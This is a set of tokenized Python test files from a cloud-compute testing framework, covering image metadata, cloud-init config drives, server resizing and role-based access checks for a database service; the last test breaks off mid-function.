with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . set_image_metadata_item ( <NUM_LIT> , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT>' ) <EOL> def test_delete_image_metadata_item_for_nonexistent_image ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . images_client . delete_image_metadata_item ( <NUM_LIT> , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudroast . compute . fixtures import ComputeFixture <EOL> class CloudInitConfigTest ( ComputeFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( CloudInitConfigTest , cls ) . setUpClass ( ) <EOL> init_st = cls . config_drive_behaviors . read_cloud_init_for_config_drive ( <EOL> cls . cloud_init_config . cloud_config_format_script ) <EOL> cls . user_data_contents = init_st <EOL> user_data = base64 . b64encode ( cls . user_data_contents ) <EOL> cls . key = cls . keypairs_client . create_keypair ( rand_name ( "<STR_LIT:key>" ) ) . entity <EOL> cls . resources . add ( cls . key . name , <EOL> cls . keypairs_client . delete_keypair ) <EOL> cls . server_response = cls . server_behaviors . create_active_server ( <EOL> config_drive = True , <EOL> key_name = cls . key . name , <EOL> user_data = user_data ) <EOL> cls . server = cls . server_response . entity <EOL> cls . user_data_filepath = '<STR_LIT>' . format ( <EOL> cls . config_drive_config . base_path_to_mount ) <EOL> cls . resources . add ( cls . server . id , <EOL> cls . servers_client . delete_server ) <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT:yes>' ) <EOL> def test_cloud_config_input_format ( self ) : <EOL> """<STR_LIT>""" <EOL> message = "<STR_LIT>" <EOL> self . config_drive_behaviors . mount_config_drive ( <EOL> server = self . server , servers_config = self . servers_config , <EOL> key = self . key . private_key , <EOL> source_path = self . config_drive_config . mount_source_path , <EOL> destination_path = self . config_drive_config . base_path_to_mount ) <EOL> remote_client = self . server_behaviors . get_remote_instance_client ( <EOL> self . server , self . servers_config , key = self . key . private_key ) <EOL> instanse_user_data = remote_client . get_file_details ( <EOL> self . user_data_filepath ) <EOL> self . assertEqual ( instanse_user_data . content , <EOL> self . user_data_contents , <EOL> msg = message . format ( '<STR_LIT>' , <EOL> instanse_user_data . content , <EOL> self . user_data_contents ) ) <EOL> dir_cloud_config_present = self . config_drive_behaviors . status_of_manage_etc_hosts ( server = self . server , <EOL> servers_config = self . servers_config , <EOL> key = self . key . private_key ) <EOL> self . assertTrue ( dir_cloud_config_present , <EOL> msg = "<STR_LIT>" ) <EOL> hosts = remote_client . get_file_details ( '<STR_LIT>' ) . content <EOL> self . assertIn ( '<STR_LIT>' , hosts , msg = "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudcafe . compute . common . types import ComputeHypervisors , NovaServerStatusTypes <EOL> from cloudcafe . compute . config import ComputeConfig <EOL> from cloudcafe . compute . flavors_api . config import FlavorsConfig <EOL> from cloudroast . compute . fixtures import ServerFromImageFixture <EOL> compute_config = ComputeConfig ( ) <EOL> hypervisor = compute_config . hypervisor . lower ( ) <EOL> flavors_config = FlavorsConfig ( ) <EOL> resize_up_enabled = ( flavors_config . resize_up_enabled <EOL> if flavors_config . resize_up_enabled is not None <EOL> else flavors_config . resize_enabled ) <EOL> can_resize = ( <EOL> resize_up_enabled <EOL> and hypervisor not in [ ComputeHypervisors . IRONIC , <EOL> ComputeHypervisors . LXC_LIBVIRT ] ) <EOL> class ResizeServerDataIntegrityTests ( object ) : <EOL> @ tags ( type = '<STR_LIT>' , net = '<STR_LIT:yes>' ) <EOL> def test_active_file_inject_during_resize ( self ) : <EOL> """<STR_LIT>""" <EOL> server_to_resize = self . server <EOL> self . resize_resp = self . servers_client . resize ( <EOL> server_to_resize . id , self . flavor_ref_alt ) <EOL> self . server_behaviors . wait_for_server_task_state ( <EOL> self . server . id , '<STR_LIT>' , <EOL> self . servers_config . server_build_timeout ) <EOL> remote_client = self . server_behaviors . get_remote_instance_client ( <EOL> self . server , self . servers_config , key = self . key . private_key ) <EOL> prototype_file = remote_client . create_file ( <EOL> file_name = '<STR_LIT>' , <EOL> file_content = "<STR_LIT:content>" , <EOL> file_path = self . servers_config . default_file_path ) . content <EOL> self . server_behaviors . wait_for_server_status ( <EOL> server_to_resize . id , NovaServerStatusTypes . VERIFY_RESIZE ) <EOL> self . confirm_resize_resp = self . servers_client . confirm_resize ( <EOL> server_to_resize . id ) <EOL> self . server_behaviors . wait_for_server_status ( <EOL> server_to_resize . id , NovaServerStatusTypes . ACTIVE ) <EOL> remote_client = self . server_behaviors . get_remote_instance_client ( <EOL> self . server , self . servers_config , key = self . key . private_key ) <EOL> file = remote_client . get_file_details ( <EOL> file_path = '<STR_LIT>' . format ( <EOL> self . servers_config . default_file_path ) ) . content <EOL> self . assertEqual ( prototype_file , file , <EOL> msg = "<STR_LIT>" ) <EOL> @ unittest . skipUnless ( <EOL> can_resize , '<STR_LIT>' ) <EOL> class ServerFromImageResizeServerUpConfirmTests ( ServerFromImageFixture , <EOL> ResizeServerDataIntegrityTests ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( ServerFromImageResizeServerUpConfirmTests , cls ) . setUpClass ( ) <EOL> cls . key = cls . keypairs_client . create_keypair ( rand_name ( "<STR_LIT:key>" ) ) . entity <EOL> cls . resources . add ( cls . key . name , <EOL> cls . keypairs_client . delete_keypair ) <EOL> cls . create_server ( key_name = cls . key . name ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from cloudcafe . compute . common . types import ComputeHypervisors <EOL> from cloudcafe . compute . config import ComputeConfig <EOL> from cloudcafe . compute . flavors_api . config import FlavorsConfig <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudroast . compute . instance_actions . api . test_resize_server_confirm import ResizeServerUpConfirmTests , ResizeUpConfirmBaseFixture <EOL> from cloudroast . compute . fixtures import ServerFromVolumeV1Fixture <EOL> compute_config = ComputeConfig ( ) <EOL> hypervisor = compute_config . hypervisor . lower ( ) <EOL> flavors_config = FlavorsConfig ( ) <EOL> resize_up_enabled = ( flavors_config . resize_up_enabled <EOL> if flavors_config . resize_up_enabled is not None <EOL> else flavors_config . resize_enabled ) <EOL> can_resize = ( <EOL> resize_up_enabled <EOL> and hypervisor not in [ ComputeHypervisors . IRONIC , <EOL> ComputeHypervisors . LXC_LIBVIRT ] ) <EOL> @ unittest . skipUnless ( <EOL> can_resize , '<STR_LIT>' ) <EOL> class ServerFromVolumeV1ResizeUpConfirmTests ( ServerFromVolumeV1Fixture , <EOL> ResizeServerUpConfirmTests , <EOL> ResizeUpConfirmBaseFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( ServerFromVolumeV1ResizeUpConfirmTests , cls ) . setUpClass ( ) <EOL> cls . key = cls . keypairs_client . create_keypair ( rand_name ( "<STR_LIT:key>" ) ) . entity <EOL> cls . resources . add ( cls . key . name , <EOL> cls . keypairs_client . delete_keypair ) <EOL> cls . create_server ( key_name = cls . key . name ) <EOL> cls . resize_up_and_confirm ( ) <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> def test_resized_server_disk_size ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from test_repo . database . fixtures import DBaaSFixture <EOL> class RBACTest ( DBaaSFixture ) : <EOL> dbaas_admin = None <EOL> dbaas_creator = None <EOL> dbaas_observer = None <EOL> admin_instance_id = None <EOL> creator_instance_id = None <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( RBACTest , cls ) . setUpClass ( ) <EOL> cls . dbaas_admin = cls . admin_client . reddwarfclient <EOL> cls . dbaas_admin . authenticate ( ) <EOL> resp , body = RBACTest . dbaas_admin . client . last_response <EOL> j = json . loads ( body ) <EOL> role = j [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> assert ( role == DBaaSFixture . Role . admin ) <EOL> cls . dbaas_creator = cls . creator_client . reddwarfclient <EOL> cls . dbaas_creator . authenticate ( ) <EOL> resp , body = cls . dbaas_creator . client . last_response <EOL> j = json . loads ( body ) <EOL> roles = j [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] [ '<STR_LIT>' ] <EOL> role_found = False <EOL> for role in roles : <EOL> role_name = role [ '<STR_LIT:name>' ] <EOL> if role_name == DBaaSFixture . Role . creator : <EOL> role_found = True <EOL> assert role_found <EOL> cls . dbaas_observer = cls . observer_client . reddwarfclient <EOL> cls . dbaas_observer . authenticate ( ) <EOL> resp , body = cls . dbaas_observer . client . last_response <EOL> j = json . loads ( body ) <EOL> roles = j [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] [ '<STR_LIT>' ] <EOL> role_found = False <EOL> for role in roles : <EOL> role_name = role [ '<STR_LIT:name>' ] <EOL> if role_name == DBaaSFixture . Role . observer : <EOL> role_found = True <EOL> assert role_found <EOL> try : <EOL> cls . admin_instance_id , time = cls . behavior . create_active_instance ( cls . dbaas_admin ) <EOL> except BaseException as be : <EOL> assert be is None <EOL> try : <EOL> cls . creator_instance_id , time = cls . behavior . create_active_instance ( cls . dbaas_creator ) <EOL> except BaseException as be : <EOL> assert be is None <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> status = cls . behavior . get_instance_status ( cls . dbaas_creator , <EOL> cls . creator_instance_id ) <EOL> if cls . behavior . is_instance_active ( cls . dbaas_creator , <EOL> instanceStatus = status ) : <EOL> cls . dbaas_admin . instances . get ( cls . creator_instance_id ) . delete ( ) <EOL> status = cls . behavior . get_instance_status ( cls . dbaas_admin , <EOL> cls . admin_instance_id ) <EOL> if cls . behavior . is_instance_active ( cls . dbaas_admin , <EOL> instanceStatus = status ) : <EOL> cls . dbaas_admin . instances . get ( cls . admin_instance_id ) . delete ( ) <EOL> def test_rbac_database_admin_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> try : <EOL> self . dbaas_admin . databases . create ( self . admin_instance_id , db_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_admin . databases . list ( <EOL> self . dbaas_creator . instances . get ( self . admin_instance_id ) ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_admin . databases . delete ( self . admin_instance_id , db_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_users_admin_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> user_name = "<STR_LIT>" <EOL> user_body = [ { "<STR_LIT>" : db_body , <EOL> "<STR_LIT:name>" : user_name , <EOL> "<STR_LIT:password>" : "<STR_LIT:password>" } ] <EOL> try : <EOL> self . dbaas_admin . users . create ( self . admin_instance_id , user_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . list ( <EOL> self . dbaas_admin . instances . get ( self . admin_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . delete ( self . admin_instance_id , db_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . list_access ( self . admin_instance_id , <EOL> user_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_admin . users . revoke ( self . admin_instance_id , user_name , <EOL> db_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> _db_list = [ db_name ] <EOL> self . dbaas_admin . users . grant ( self . admin_instance_id , user_name , <EOL> _db_list ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> user_body [ <NUM_LIT:0> ] [ '<STR_LIT:password>' ] = "<STR_LIT>" <EOL> self . dbaas_admin . users . change_passwords ( self . admin_instance_id , <EOL> user_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_flavors_admin_rights ( self ) : <EOL> expectedFlavorRamName = { <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" } <EOL> try : <EOL> flavorList = self . dbaas_admin . flavors . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> actualFlavorRamName = { } <EOL> self . assertIsNotNone ( flavorList , "<STR_LIT>" ) <EOL> for flavor in flavorList : <EOL> self . assertIsNotNone ( flavor . id , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . links , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . name , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . ram , "<STR_LIT>" ) <EOL> actualFlavorRamName [ flavor . ram ] = str ( flavor . name ) <EOL> self . assertEqual ( expectedFlavorRamName , <EOL> actualFlavorRamName , <EOL> "<STR_LIT>" <EOL> % ( expectedFlavorRamName , actualFlavorRamName ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_instance_admin_rights ( self ) : <EOL> next_flavor = <NUM_LIT:1> <EOL> final_flavor = <NUM_LIT:2> <EOL> resize_vol = <NUM_LIT:5> <EOL> try : <EOL> instancesList = self . dbaas_admin . instances . list ( ) <EOL> self . assertIsNotNone ( instancesList ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> current_instance = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) <EOL> self . assertIsNotNone ( current_instance ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> user_name , user_password = self . dbaas_admin . root . create ( <EOL> self . admin_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . assertEqual ( user_name , '<STR_LIT:root>' , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( user_password , "<STR_LIT>" ) <EOL> self . assertTrue ( <EOL> self . dbaas_admin . root . is_root_enabled ( self . admin_instance_id ) , <EOL> "<STR_LIT>" ) <EOL> self . dbaas_admin . instances . resize_instance ( self . admin_instance_id , <EOL> next_flavor ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == <EOL> '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> flavorId = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) . flavor [ "<STR_LIT:id>" ] <EOL> self . assertEqual ( str ( next_flavor ) , flavorId , <EOL> "<STR_LIT>" <EOL> % ( next_flavor , flavorId ) ) <EOL> self . dbaas_admin . instances . resize_instance ( self . admin_instance_id , <EOL> final_flavor ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> flavorId = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) . flavor [ "<STR_LIT:id>" ] <EOL> self . assertEqual ( str ( final_flavor ) , flavorId , <EOL> "<STR_LIT>" <EOL> % ( final_flavor , flavorId ) ) <EOL> self . dbaas_admin . instances . restart ( self . admin_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> self . dbaas_admin . instances . resize_volume ( self . admin_instance_id , <EOL> resize_vol ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_admin ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> status = self . behavior . get_instance_status ( self . dbaas_admin , <EOL> self . admin_instance_id ) <EOL> self . assertEqual ( status , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % status ) <EOL> self . behavior . wait_for_active ( self . dbaas_admin , <EOL> instanceId = self . admin_instance_id ) <EOL> volume_size = self . dbaas_admin . instances . get ( <EOL> self . admin_instance_id ) . volume [ "<STR_LIT:size>" ] <EOL> self . assertEqual ( resize_vol , volume_size , <EOL> "<STR_LIT>" <EOL> % ( resize_vol , volume_size ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_database_creator_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> try : <EOL> self . dbaas_creator . databases . create ( self . creator_instance_id , <EOL> db_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . databases . list ( self . dbaas_creator . instances . get ( <EOL> self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . databases . delete ( self . creator_instance_id , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_users_creator_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> user_name = "<STR_LIT>" <EOL> user_body = [ { "<STR_LIT>" : db_body , "<STR_LIT:name>" : user_name , <EOL> "<STR_LIT:password>" : "<STR_LIT:password>" } ] <EOL> try : <EOL> self . dbaas_creator . users . create ( self . creator_instance_id , <EOL> user_body ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . users . list ( <EOL> self . dbaas_creator . instances . get ( self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . users . delete ( self . creator_instance_id , db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . users . list_access ( self . creator_instance_id , <EOL> user_name ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_creator . users . revoke ( self . creator_instance_id , <EOL> user_name , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> _db_list = [ db_name ] <EOL> self . dbaas_creator . users . grant ( self . creator_instance_id , <EOL> user_name , <EOL> _db_list ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> user_body [ <NUM_LIT:0> ] [ '<STR_LIT:password>' ] = "<STR_LIT>" <EOL> self . dbaas_creator . users . change_passwords ( self . creator_instance_id , <EOL> user_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_flavors_creator_rights ( self ) : <EOL> expectedFlavorRamName = { <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" } <EOL> try : <EOL> flavorList = self . dbaas_creator . flavors . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> actualFlavorRamName = { } <EOL> self . assertIsNotNone ( flavorList , "<STR_LIT>" ) <EOL> for flavor in flavorList : <EOL> self . assertIsNotNone ( flavor . id , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . links , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . name , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . ram , "<STR_LIT>" ) <EOL> actualFlavorRamName [ flavor . ram ] = str ( flavor . name ) <EOL> self . assertEqual ( expectedFlavorRamName , <EOL> actualFlavorRamName , <EOL> "<STR_LIT>" <EOL> % ( expectedFlavorRamName , actualFlavorRamName ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_instance_creator_rights ( self ) : <EOL> next_flavor = <NUM_LIT:1> <EOL> resize_vol = <NUM_LIT:5> <EOL> try : <EOL> instancesList = self . dbaas_creator . instances . list ( ) <EOL> self . assertIsNotNone ( instancesList ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> current_instance = self . dbaas_creator . instances . get ( <EOL> self . creator_instance_id ) <EOL> self . assertIsNotNone ( current_instance ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . root . create ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_creator . root . is_root_enabled ( self . creator_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . resize_instance ( <EOL> self . creator_instance_id , <EOL> next_flavor ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . restart ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . resize_volume ( <EOL> self . creator_instance_id , <EOL> resize_vol ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . get ( <EOL> self . creator_instance_id ) . delete ( ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_database_observer_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : 